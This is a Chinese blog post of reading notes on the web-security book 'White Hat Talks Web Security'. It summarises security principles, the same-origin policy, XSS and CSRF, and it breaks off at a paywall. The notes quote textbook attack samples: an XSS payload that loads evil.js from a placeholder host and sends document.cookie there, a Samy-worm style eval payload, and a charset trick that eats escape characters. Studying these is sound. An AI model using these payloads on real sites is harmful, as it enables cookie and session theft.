《白帽子讲Web安全》读书笔记

最新推荐文章于 2022-03-11 17:22:38 发布
最新推荐文章于 2022-03-11 17:22:38 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 笔记摘要 文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leng_que/article/details/44873791
版权
本文是《白帽子讲Web安全》一书的读书笔记,深入探讨了Web安全的基础概念和高级策略,包括安全三要素、白帽子兵法、浏览器安全、XSS与CSRF、SQL注入防御、文件上传漏洞、认证授权机制、DDoS攻击及防御、业务逻辑安全等多个方面,旨在提升Web应用的安全性。
摘要由CSDN通过智能技术生成 
------

“安全问题的本质是信任的问题”

安全三要素:机密性、完整性、可用性

白帽子兵法:Secure By Default 原则(1:黑白单、白名单 2:最小权限原则)、纵深防御原则、数据与代码分离原则、不可预测性原则

“所有的程序本来也没有漏洞,只有功能,但当一些功能被用于破坏,造成损失时,也就成了漏洞。”

浏览器安全:同源策略、浏览器沙箱(备注:沙箱内的程序要与外界通信时是通过特殊封装的API进行的,这些API内部通常有着很强的安全检测)

------

XSS Payload:
<script src=http://xxx/evil.js></script>
evil.js 内容:
var img = document.createElement("img");
img.src = "http://xxx/log?"+escape(document.cookie);
document.body.appendChild(img);

XSS Worm:Samy Worm、百度空间蠕虫

<DIV id=mycode style="BACKGROUND: url('javascript:eval(document.all.mycode.expr)')" expr="..."></DIV>

利用字符编码:%c1\(备注:基于字符集的攻击,让原来的两个字符变成一个Unicode字符,从而“吃掉”转义符)

eval(location.hash.substr(1))

------

Anti CSRF Token

(再次理解“同源策略”)
(区别 XSS
最低0.47元/天 解锁文章
leng_que
关注
专栏目录
读《白帽子Web安全》有感
分享与记录
01-20 1687
该博客转自hangshao.tech,之前忘记在CSDN发布了。 今天是2020.11.19,我开始了第二次拜读《白帽子Web安全》。 记得大一的时候就买过这本书,不过奈何当时水平有限,实在是难以阅读下去,于是放弃。我想,在大三的时候再来重拾这本书,应该会有所收获,如果还能作一个总结,那便更好,所以现在陆陆续续地写一些吧,写一点发一点,或许全部写完的时候,已经是2021年了。(在写了在写了…) 第一章是巨佬吴翰清述他的安全世界观。这一章了中国黑客史,介绍了白帽子和黑帽子,揭示了他认为的安全问题的本质
白帽子web安全读后感1
南浦
02-07 2517
白帽子web安全读后感1 本文实际上算是白帽子web安全的回顾,总结了一些我觉得比较重要的关键词,方便以后复习.具体内容可以参考书 浏览器安全 本文对应第2章节,主要的内容是同源策略.当然也可以参考阮一峰老师的文章 终止就是要保证协议,域名和端口的一致,如果看到提示cros错误就要考虑这个问题. 另外现在app开发喜欢采用浏览器套壳的策略,同时还有h5小程序开发,总之前端技术大有可为. 跨站脚本攻击(XSS) 本文是第三章 跨站脚本攻击(Cross Site Script,简称 XSS),利用网页开发时
白帽子web安全读后感
wswr的博客
03-11 1038
第一章 我的安全世界观 安全问题本质就是信任问题【你总要制定一个基准以此判断是否安全,这个基准怎么理解呢,比方上传文件,做的限制和过滤就是一个基准,通过这个基准你去信任自己是否是安全的】 安全是一个持续的过程【攻防都在进步,道高一尺魔高一丈,不断出现的漏洞和对应补丁就是很好的例子去理解为什么持续的安全白帽子兵法: Secure by Default(默认的安全)一方面是白名单思想【黑名单存在被各种可能的绕过】,一方面是最小权限原则(最差的情况即使被攻克了,拿到的权限也不高) 纵深防御原则:一方
白帽子Web安全 读书笔记
03-12
### 白帽子Web安全读书笔记一:关键知识点解析 #### 第零篇 总览 - **客户端脚本安全**:这部分主要关注浏览器环境下的安全问题,包括浏览器自身的安全机制以及用户与网页交互过程中可能遇到的安全风险。 - **...
读书笔记白帽子Web安全.zip
07-26
读书笔记白帽子Web安全
读书笔记白帽子web安全思维导图.zip
07-26
读书笔记白帽子web安全思维导图
读书笔记:阅读《白帽子Web安全》+《Web前端黑客技术揭秘》动手demo.zip
最新发布
07-29
读书笔记:阅读《白帽子Web安全》+《Web前端黑客技术揭秘》动手demo
白帽子web安全》读后感之一
weixin_33928137的博客
09-02 316
本周的技术读物是《白帽子web安全》。 这本书让我认识了吴翰清,一个年轻的技术大牛。安全宝的负责人之一。关于安全方面是个小白的我,觉得***防御真的很神奇,希望多少了解一些,于是选择了这本红皮书。 好了,转入正题。今天看了第一部分--世界安全观。是大概念上安全的意识,还算比较简单。总结一下: 1.安全问题的本质是信任的问题。一切安全设计的方案的基础建立在信任的关...
白帽子web安全读后感2
南浦
02-13 2947
网络安全,本文是白帽子web安全的读后感
白帽子web安全 读书笔记
think_ycx的专栏
04-18 1682
回顾一下经典
白帽子web安全读书笔记以及读后感
Alexz__的博客
06-15 1861
因为本书作于2010年前,书中所使用的部分技术版本已经过于老旧,很多书中提到的攻击方法和绕过思路都已经严重落后,但之所以本书会成为安全界的经典必读书目,就是因为本书所讨论的安全思想尤为精华,对于企业来说的安全建设十分有用,所以我打算读这本书的过程中主要记录下来一些重要的安全思路,绕过思想,重要的烧过姿势,不回去特意记录他所有的精工代码等等 对于IT这个领域来说10年的时间足矣改变整个行业的组织架构,走了很多,也来了很多 第一章 我的安全世界观 1.4 安全是一个持续的过程;破...
白帽子WEB安全——读书笔记(一)
雨山林稀的博客
04-28 840
安全的三要素CIA:机密性(confidentiality)、完整性(integrity)、可用性(availability)。
读书笔记----白帽子web安全--2015-11-27
u010459047的博客
11-27 1233
一,浏览器的同源策略       1.为网站安全性考虑,是浏览器最基本的安全策略;限制俩只不同源的document脚本对当前的document脚本读取或设置某些属性      2. 但是在浏览器中,某些标签是可以跨域加载资源:.,,利用这些标签加载其他未知文件会导致网站陷入不安全中      3. xmlhttprequest收到同源策略的约束,不能跨域访问资源。     4. ie8 c
白帽子Web安全读书笔记:初探Web安全风险
"《白帽子Web安全读书笔记,涵盖了Web安全的多个重要主题,包括客户端脚本安全、服务端应用安全等,涉及到的攻击类型有跨站脚本攻击(XSS)、跨站点请求伪造(CSRF)、点击劫持(ClickJacking)以及HTML5带来的新安全...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值